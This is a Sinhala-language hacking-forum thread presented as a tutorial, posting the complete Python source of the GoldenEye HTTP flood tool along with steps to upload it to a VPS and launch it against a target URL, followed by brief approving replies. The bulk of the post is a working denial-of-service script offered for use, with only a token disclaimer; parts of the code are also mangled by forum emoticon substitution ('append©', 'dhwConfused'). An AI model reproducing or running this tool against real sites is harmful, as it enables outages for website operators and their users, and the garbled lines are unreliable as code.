ඔබ තවමත් Widane Forums සාමාජිකයෙක් නෙවෙයි ද..?

Widane Forums හි සියළුම ලිපිවල ඇති සියළුම Links වෙත පිවිසීමට නම් ලියාපදිංචිවීම අනිවාර්යයි.
ඔබගේ සියලුම තාක්ෂණික ගැටළු සඳහා විසඳුම් සොගැනීමට වගේම දැනුම බෙදාගැනීම සඳහා මෙහි ඉඩකඩ වෙන්කර තිබෙනවා.
ඉතින් ඇයි තවත් බලාගෙන ඉන්නේ ඉක්මනින් ලියාපදිංචිවී ඔබගේ දැනුම වැඩිකරගන්න.

Register Here
[Tut] DOS/DDOS Python Script - (Golden Eye)
#1
හොඳයි අද අපේ කොල්ලන්ට තවත් වැදගත් සහ ගොඩාක් දෙනෙක් ඉල්ලපු දෙයක් තමයි අරගෙන ආවේ. ඒ තමයි DOS/DDOS Python Script එකක්. මේක Golden Eye කියන Python Script එක. මේක Layer 7 (Application Layer) Script එකක් ඒ වගේම හොඳ Script එකක් කියලා කියන්න පුළුවන්. එහෙනම් පල්ලේහායින් මම ඒ Code එක දානවා. ඒක anyname.py වගේ ෆයිල් එකක් හදලා ඇතුලට කොපි කරගන්න. පස්සේ ඒ ෆයිල් එක ඔයාලාගේ VPS (Virtual Private Server) එකට දාගන්න. Linux VPS එකක් නම් ගොඩාක් හොඳයි මොකද Windows VPS එකක් නම් අපිට පයිතන් වෙනම ආපහු ඉන්ස්ටෝල් කරගන්න වෙන නිසා.


මෙන්න Code එක,

#!/usr/bin/env python

"""
$Id: $
    /$$$$$$            /$$       /$$                     /$$$$$$$$                    
   /$$__  $$          | $$      | $$                    | $$_____/                    
  | $$  \__/  /$$$$$$ | $$  /$$$$$$$  /$$$$$$  /$$$$$$$ | $$       /$$   /$$  /$$$$$$
  | $$ /$$$$ /$$__  $$| $$ /$$__  $$ /$$__  $$| $$__  $$| $$$$$   | $$  | $$ /$$__  $$
  | $$|_  $$| $$  \ $$| $$| $$  | $$| $$$$$$$$| $$  \ $$| $$__/   | $$  | $$| $$$$$$$$
  | $$  \ $$| $$  | $$| $$| $$  | $$| $$_____/| $$  | $$| $$      | $$  | $$| $$_____/
  |  $$$$$$/|  $$$$$$/| $$|  $$$$$$$|  $$$$$$$| $$  | $$| $$$$$$$$|  $$$$$$$|  $$$$$$$
   \______/  \______/ |__/ \_______/ \_______/|__/  |__/|________/ \____  $$ \_______/
                                                                    /$$  | $$          
                                                                   |  $$$$$$/          
                                                                    \______/          
                                                                                                                                                                                                     
This tool is a dos tool that is meant to put heavy load on HTTP servers
in order to bring them to their knees by exhausting the resource pool.
This tool is meant for research purposes only
and any malicious usage of this tool is prohibited.
@author Jan Seidl <http://wroot.org/>
@date 2014-02-18
@version 2.1
@TODO Test in python 3.x
LICENSE:
This software is distributed under the GNU General Public License version 3 (GPLv3)
LEGAL NOTICE:
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY!
IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY
THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT.
BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.
"""

from multiprocessing import Process, Manager, Pool
import urlparse, ssl
import sys, getopt, random, time, os

# Python version-specific
if  sys.version_info < (3,0):
   # Python 2.x
   import httplib
   HTTPCLIENT = httplib
else:
   # Python 3.x
   import http.client
   HTTPCLIENT = http.client

####
# Config
####
DEBUG = False

####
# Constants
####
METHOD_GET  = 'get'
METHOD_POST = 'post'
METHOD_RAND = 'random'

JOIN_TIMEOUT=1.0

DEFAULT_WORKERS=10
DEFAULT_SOCKETS=500

GOLDENEYE_BANNER = 'GoldenEye v2.1 by Jan Seidl <[email protected]>'

USER_AGENT_PARTS = {
   'os': {
       'linux': {
           'name': [ 'Linux x86_64', 'Linux i386' ],
           'ext': [ 'X11' ]
       },
       'windows': {
           'name': [ 'Windows NT 6.1', 'Windows NT 6.3', 'Windows NT 5.1', 'Windows NT.6.2' ],
           'ext': [ 'WOW64', 'Win64; x64' ]
       },
       'mac': {
           'name': [ 'Macintosh' ],
           'ext': [ 'Intel Mac OS X %d_%d_%d' % (random.randint(10, 11), random.randint(0, 9), random.randint(0, 5)) for i in range(1, 10) ]
       },
   },
   'platform': {
       'webkit': {
           'name': [ 'AppleWebKit/%d.%d' % (random.randint(535, 537), random.randint(1,36)) for i in range(1, 30) ],
           'details': [ 'KHTML, like Gecko' ],
           'extensions': [ 'Chrome/%d.0.%d.%d Safari/%d.%d' % (random.randint(6, 32), random.randint(100, 2000), random.randint(0, 100), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 30) ] + [ 'Version/%d.%d.%d Safari/%d.%d' % (random.randint(4, 6), random.randint(0, 1), random.randint(0, 9), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 10) ]
       },
       'iexplorer': {
           'browser_info': {
               'name': [ 'MSIE 6.0', 'MSIE 6.1', 'MSIE 7.0', 'MSIE 7.0b', 'MSIE 8.0', 'MSIE 9.0', 'MSIE 10.0' ],
               'ext_pre': [ 'compatible', 'Windows; U' ],
               'ext_post': [ 'Trident/%d.0' % i for i in range(4, 6) ] + [ '.NET CLR %d.%d.%d' % (random.randint(1, 3), random.randint(0, 5), random.randint(1000, 30000)) for i in range(1, 10) ]
           }
       },
       'gecko': {
           'name': [ 'Gecko/%d%02d%02d Firefox/%d.0' % (random.randint(2001, 2010), random.randint(1,31), random.randint(1,12) , random.randint(10, 25)) for i in range(1, 30) ],
           'details': [],
           'extensions': []
       }
   }
}

####
# GoldenEye Class
####

class GoldenEye(object):

   # Counters
   counter = [0, 0]
   last_counter = [0, 0]

   # Containers
   workersQueue = []
   manager = None
   useragents = []

   # Properties
   url = None

   # Options
   nr_workers = DEFAULT_WORKERS
   nr_sockets = DEFAULT_SOCKETS
   method = METHOD_GET

   def __init__(self, url):

       # Set URL
       self.url = url

       # Initialize Manager
       self.manager = Manager()

       # Initialize Counters
       self.counter = self.manager.list((0, 0))


   def exit(self):
       self.stats()
       print "Shutting down GoldenEye"

   def __del__(self):
       self.exit()

   def printHeader(self):

       # Taunt!
       print
       print GOLDENEYE_BANNER
       print

   # Do the fun!
   def fire(self):

       self.printHeader()
       print "Hitting webserver in mode '{0}' with {1} workers running {2} connections each. Hit CTRL+C to cancel.".format(self.method, self.nr_workers, self.nr_sockets)

       if DEBUG:
           print "Starting {0} concurrent workers".format(self.nr_workers)

       # Start workers
       for i in range(int(self.nr_workers)):

           try:

               worker = Striker(self.url, self.nr_sockets, self.counter)
               worker.useragents = self.useragents
               worker.method = self.method

               self.workersQueue.append(worker)
               worker.start()
           except (Exception):
               error("Failed to start worker {0}".format(i))
               pass

       if DEBUG:
           print "Initiating monitor"
       self.monitor()

   def stats(self):

       try:
           if self.counter[0] > 0 or self.counter[1] > 0:

               print "{0} GoldenEye strikes deferred. ({1} Failed)".format(self.counter[0], self.counter[1])

               if self.counter[0] > 0 and self.counter[1] > 0 and self.last_counter[0] == self.counter[0] and self.counter[1] > self.last_counter[1]:
                   print "\tServer may be DOWN!"
   
               self.last_counter[0] = self.counter[0]
               self.last_counter[1] = self.counter[1]
       except (Exception):
           pass # silently ignore

   def monitor(self):
       while len(self.workersQueue) > 0:
           try:
               for worker in self.workersQueue:
                   if worker is not None and worker.is_alive():
                       worker.join(JOIN_TIMEOUT)
                   else:
                       self.workersQueue.remove(worker)

               self.stats()

           except (KeyboardInterrupt, SystemExit):
               print "CTRL+C received. Killing all workers"
               for worker in self.workersQueue:
                   try:
                       if DEBUG:
                           print "Killing worker {0}".format(worker.name)
                       #worker.terminate()
                       worker.stop()
                   except Exception, ex:
                       pass # silently ignore
               if DEBUG:
                   raise
               else:
                   pass

####
# Striker Class
####

class Striker(Process):

       
   # Counters
   request_count = 0
   failed_count = 0

   # Containers
   url = None
   host = None
   port = 80
   ssl = False
   referers = []
   useragents = []
   socks = []
   counter = None
   nr_socks = DEFAULT_SOCKETS

   # Flags
   runnable = True

   # Options
   method = METHOD_GET

   def __init__(self, url, nr_sockets, counter):

       super(Striker, self).__init__()

       self.counter = counter
       self.nr_socks = nr_sockets

       parsedUrl = urlparse.urlparse(url)

       if parsedUrl.scheme == 'https':
           self.ssl = True

       self.host = parsedUrl.netloc.split(':')[0]
       self.url = parsedUrl.path

       self.port = parsedUrl.port

       if not self.port:
           self.port = 80 if not self.ssl else 443


       self.referers = [
           'http://www.google.com/',
           'http://www.bing.com/',
           'http://www.baidu.com/',
           'http://www.yandex.com/',
           'http://' + self.host + '/'
           ]


   def __del__(self):
       self.stop()


   #builds random ascii string
   def buildblock(self, size):
       out_str = ''

       _LOWERCASE = range(97, 122)
       _UPPERCASE = range(65, 90)
       _NUMERIC   = range(48, 57)

       validChars = _LOWERCASE + _UPPERCASE + _NUMERIC

       for i in range(0, size):
           a = random.choice(validChars)
           out_str += chr(a)

       return out_str


   def run(self):

       if DEBUG:
           print "Starting worker {0}".format(self.name)

       while self.runnable:

           try:

               for i in range(self.nr_socks):
               
                   if self.ssl:
                       c = HTTPCLIENT.HTTPSConnection(self.host, self.port)
                   else:
                       c = HTTPCLIENT.HTTPConnection(self.host, self.port)

                   self.socks.append©

               for conn_req in self.socks:

                   (url, headers) = self.createPayload()

                   method = random.choice([METHOD_GET, METHOD_POST]) if self.method == METHOD_RAND else self.method

                   conn_req.request(method.upper(), url, None, headers)

               for conn_resp in self.socks:

                   resp = conn_resp.getresponse()
                   self.incCounter()

               self.closeConnections()
               
           except:
               self.incFailed()
               if DEBUG:
                   raise
               else:
                   pass # silently ignore

       if DEBUG:
           print "Worker {0} completed run. Sleeping...".format(self.name)
           
   def closeConnections(self):
       for conn in self.socks:
           try:
               conn.close()
           except:
               pass # silently ignore
           

   def createPayload(self):

       req_url, headers = self.generateData()

       random_keys = headers.keys()
       random.shuffle(random_keys)
       random_headers = {}
       
       for header_name in random_keys:
           random_headers[header_name] = headers[header_name]

       return (req_url, random_headers)

   def generateQueryString(self, ammount = 1):

       queryString = []

       for i in range(ammount):

           key = self.buildblock(random.randint(3,10))
           value = self.buildblock(random.randint(3,20))
           element = "{0}={1}".format(key, value)
           queryString.append(element)

       return '&'.join(queryString)
           
   
   def generateData(self):

       returnCode = 0
       param_joiner = "?"

       if len(self.url) == 0:
           self.url = '/'

       if self.url.count("?") > 0:
           param_joiner = "&"

       request_url = self.generateRequestUrl(param_joiner)

       http_headers = self.generateRandomHeaders()


       return (request_url, http_headers)

   def generateRequestUrl(self, param_joiner = '?'):

       return self.url + param_joiner + self.generateQueryString(random.randint(1,5))

   def getUserAgent(self):

       if self.useragents:
           return random.choice(self.useragents)

       # Mozilla/[version] ([system and browser information]) [platform] ([platform details]) [extensions]

       ## Mozilla Version
       mozilla_version = "Mozilla/5.0" # hardcoded for now, almost every browser is on this version except IE6

       ## System And Browser Information
       # Choose random OS
       os = USER_AGENT_PARTS['os'][random.choice(USER_AGENT_PARTS['os'].keys())]
       os_name = random.choice(os['name'])
       sysinfo = os_name

       # Choose random platform
       platform = USER_AGENT_PARTS['platform'][random.choice(USER_AGENT_PARTS['platform'].keys())]

       # Get Browser Information if available
       if 'browser_info' in platform and platform['browser_info']:
           browser = platform['browser_info']

           browser_string = random.choice(browser['name'])

           if 'ext_pre' in browser:
               browser_string = "%s; %s" % (random.choice(browser['ext_pre']), browser_string)

           sysinfo = "%s; %s" % (browser_string, sysinfo)

           if 'ext_post' in browser:
               sysinfo = "%s; %s" % (sysinfo, random.choice(browser['ext_post']))


       if 'ext' in os and os['ext']:
           sysinfo = "%s; %s" % (sysinfo, random.choice(os['ext']))

       ua_string = "%s (%s)" % (mozilla_version, sysinfo)

       if 'name' in platform and platform['name']:
           ua_string = "%s %s" % (ua_string, random.choice(platform['name']))

       if 'details' in platform and platform['details']:
           ua_string = "%s (%s)" % (ua_string, random.choice(platform['details']) if len(platform['details']) > 1 else platform['details'][0] )

       if 'extensions' in platform and platform['extensions']:
           ua_string = "%s %s" % (ua_string, random.choice(platform['extensions']))

       return ua_string

   def generateRandomHeaders(self):

       # Random no-cache entries
       noCacheDirectives = ['no-cache', 'max-age=0']
       random.shuffle(noCacheDirectives)
       nrNoCache = random.randint(1, (len(noCacheDirectives)-1))
       noCache = ', '.join(noCacheDirectives[:nrNoCache])

       # Random accept encoding
       acceptEncoding = ['\'\'','*','identity','gzip','deflate']
       random.shuffle(acceptEncoding)
       nrEncodings = random.randint(1,len(acceptEncoding)/2)
       roundEncodings = acceptEncoding[:nrEncodings]

       http_headers = {
           'User-Agent': self.getUserAgent(),
           'Cache-Control': noCache,
           'Accept-Encoding': ', '.join(roundEncodings),
           'Connection': 'keep-alive',
           'Keep-Alive': random.randint(1,1000),
           'Host': self.host,
       }
   
       # Randomly-added headers
       # These headers are optional and are
       # randomly sent thus making the
       # header count random and unfingerprintable
       if random.randrange(2) == 0:
           # Random accept-charset
           acceptCharset = [ 'ISO-8859-1', 'utf-8', 'Windows-1251', 'ISO-8859-2', 'ISO-8859-15', ]
           random.shuffle(acceptCharset)
           http_headers['Accept-Charset'] = '{0},{1};q={2},*;q={3}'.format(acceptCharset[0], acceptCharset[1],round(random.random(), 1), round(random.random(), 1))

       if random.randrange(2) == 0:
           # Random Referer
           url_part = self.buildblock(random.randint(5,10))

           random_referer = random.choice(self.referers) + url_part
           
           if random.randrange(2) == 0:
               random_referer = random_referer + '?' + self.generateQueryString(random.randint(1, 10))

           http_headers['Referer'] = random_referer

       if random.randrange(2) == 0:
           # Random Content-Trype
           http_headers['Content-Type'] = random.choice(['multipart/form-data', 'application/x-url-encoded'])

       if random.randrange(2) == 0:
           # Random Cookie
           http_headers['Cookie'] = self.generateQueryString(random.randint(1, 5))

       return http_headers

   # Housekeeping
   def stop(self):
       self.runnable = False
       self.closeConnections()
       self.terminate()

   # Counter Functions
   def incCounter(self):
       try:
           self.counter[0] += 1
       except (Exception):
           pass

   def incFailed(self):
       try:
           self.counter[1] += 1
       except (Exception):
           pass
       


####

####
# Other Functions
####

def usage():
   print
   print '-----------------------------------------------------------------------------------------------------------'
   print
   print GOLDENEYE_BANNER
   print
   print ' USAGE: ./goldeneye.py <url> [OPTIONS]'
   print
   print ' OPTIONS:'
   print '\t Flag\t\t\tDescription\t\t\t\t\t\tDefault'
   print '\t -u, --useragents\tFile with user-agents to use\t\t\t\t(default: randomly generated)'
   print '\t -w, --workers\t\tNumber of concurrent workers\t\t\t\t(default: {0})'.format(DEFAULT_WORKERS)
   print '\t -s, --sockets\t\tNumber of concurrent sockets\t\t\t\t(default: {0})'.format(DEFAULT_SOCKETS)
   print '\t -m, --method\t\tHTTP Method to use \'get\' or \'post\'  or \'random\'\t\t(default: get)'
   print '\t -d, --debug\t\tEnable Debug Mode [more verbose output]\t\t\t(default: False)'
   print '\t -h, --help\t\tShows this help'
   print
   print '-----------------------------------------------------------------------------------------------------------'

   
def error(msg):
   # print help information and exit:
   sys.stderr.write(str(msg+"\n"))
   usage()
   sys.exit(2)

####
# Main
####

def main():
   
   try:

       if len(sys.argv) < 2:
           error('Please supply at least the URL')

       url = sys.argv[1]

       if url == '-h':
           usage()
           sys.exit()

       if url[0:4].lower() != 'http':
           error("Invalid URL supplied")

       if url == None:
           error("No URL supplied")

       opts, args = getopt.getopt(sys.argv[2:], "dhwConfused:m:u:", ["debug", "help", "workers", "sockets", "method", "useragents" ])

       workers = DEFAULT_WORKERS
       socks = DEFAULT_SOCKETS
       method = METHOD_GET

       uas_file = None
       useragents = []

       for o, a in opts:
           if o in ("-h", "--help"):
               usage()
               sys.exit()
           elif o in ("-u", "--useragents"):
               uas_file = a
           elif o in ("-s", "--sockets"):
               socks = int(a)
           elif o in ("-w", "--workers"):
               workers = int(a)
           elif o in ("-d", "--debug"):
               global DEBUG
               DEBUG = True
           elif o in ("-m", "--method"):
               if a in (METHOD_GET, METHOD_POST, METHOD_RAND):
                   method = a
               else:
                   error("method {0} is invalid".format(a))
           else:
               error("option '"+o+"' doesn't exists")


       if uas_file:
           try:
               with open(uas_file) as f:
                   useragents = f.readlines()
           except EnvironmentError:
                   error("cannot read file {0}".format(uas_file))

       goldeneye = GoldenEye(url)
       goldeneye.useragents = useragents
       goldeneye.nr_workers = workers
       goldeneye.method = method
       goldeneye.nr_sockets = socks

       goldeneye.fire()

   except getopt.GetoptError, err:

       # print help information and exit:
       sys.stderr.write(str(err))
       usage()
       sys.exit(2)

if __name__ == "__main__":
   main()


හරි මේක පාවිච්චි කරන්න කලින් ෆයිල් එකට Permission 777 දෙන්න. එතකොට කිසිම කරදරයක් නැතුව මේ ෆයිල් එකෙන් වැඩේ කරගන්න පුළුවන්.
මේ Script එකෙන් DOS/DDOS එකක් ගහන්න Linux VPS එකක නම් Terminal එකේ පල්ලේහා විදිහට විධාන දෙන්න වෙනවා.

python ./anyname.py 

[To see links please login or register here]

[Options]


OPTIONS:
   -u, --useragents   File with user-agents to use                     (default: randomly generated)
   -w, --workers      Number of concurrent workers                     (default: 50)
   -s, --sockets      Number of concurrent sockets                     (default: 30)
   -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)
   -d, --debug        Enable Debug Mode [more verbose output]          (default: False)
   -h, --help         Shows this help


හරි එහෙනම් මේ ත්‍රෙඩ් එකත් ඉවරයි,
හැබැයි මේවා කියලා දුන්නා කියලා හොඳ වැඩවලට විතරක් පාවිච්චි කරන්න. වැරදි වැඩවලට පාවිච්චි කරලා දාගන්න ලෙඩවලට මම වගකියන්නේ නෑ.
ඒ වගේම තමයි අපෙන් ඉගෙනගෙන අපිටම කෙලින සමාජයක් මේක ඒ නිසා එහෙම කරන උන් මේකේ ඉන්නවානම් පරිස්සම් වෙයල්ලා.

එහෙනම් ඔයාලාගේ අදහස් උදහස් සහ මොනවාම ප්‍රශ්නයක් තිබ්බොත් පල්ලේහායින් දාන්න.
|+| Knowledge |+| Discipline |+| Patience |+|

Area Master 
(Founder & Info. Sec. Analyst)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
#2
ela bro..
digatyama liyamu.. Smile
<>
.:: [Induwara Uthsara] :: [රතු කුරුල්ලා] ::.
</>
Reply
#3
(09-13-2018, 02:12 PM)Induwara Uthsara Wrote: ela bro..
digatyama liyamu.. Smile

Elama Wink
|+| Knowledge |+| Discipline |+| Patience |+|

Area Master 
(Founder & Info. Sec. Analyst)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
Reply
#4
එල එල, Keep it up

Elite_x 
(Admin & Marketing Officer)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
Reply
#5
(09-13-2018, 03:25 PM)Elite_x Wrote: එල එල, Keep it up

Elama Wink
|+| Knowledge |+| Discipline |+| Patience |+|

Area Master 
(Founder & Info. Sec. Analyst)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
Reply
#6
එල එල දිගටම කරගෙන යමු
Reply
#7
(09-16-2018, 01:51 AM)Alex Wrote: එල එල දිගටම කරගෙන යමු

Oyala innakam api digatama karanawa Wink
|+| Knowledge |+| Discipline |+| Patience |+|

Area Master 
(Founder & Info. Sec. Analyst)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
Reply
#8
Elz Bro
Reply
#9
(09-16-2018, 02:03 PM)Redress Wrote: Elz Bro

Elama Wink
|+| Knowledge |+| Discipline |+| Patience |+|

Area Master 
(Founder & Info. Sec. Analyst)

Widane Forums
Contact Me: [email protected]
Admin Queries: [email protected]
General Queries:

[To see links please login or register here]

 
Reply
#10
ela Bro
[Image: giphy.gif]

Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tut] DDoS Attack [ජීවිත පාඩම] Elite_x 19 2,809 09-30-2019, 01:19 PM
Last Post: Elite_x
  [Tut] Ddos , Booting , Shells & etc ගැන හැම දෙයක්ම පිලිවෙලට පටන්ගමු Elite_x 11 2,754 09-07-2019, 01:42 PM
Last Post: X_99Users browsing this thread: 1 Guest(s)